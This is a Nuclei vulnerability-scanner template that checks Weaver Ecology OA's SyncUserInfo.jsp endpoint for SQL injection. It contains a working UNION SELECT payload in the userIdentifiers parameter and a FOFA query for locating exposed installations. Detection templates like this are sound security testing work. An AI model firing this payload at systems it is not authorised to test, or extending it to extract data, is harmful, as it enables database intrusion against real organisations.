nuclei-templates/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml

39 lines
1.1 KiB
YAML

id: ecology-syncuserinfo-sqli
info:
name: Ecology Syncuserinfo - SQL Injection
author: ritikchaddha
severity: critical
description: Ecology Syncuserinfo contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.weaver.com.cn/
- https://github.com/chaitin/xray/blob/master/pocs/ecology-syncuserinfo-sqli.yml
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "4386499557"
- type: status
status:
- 200
# Enhanced by mp on 2022/09/28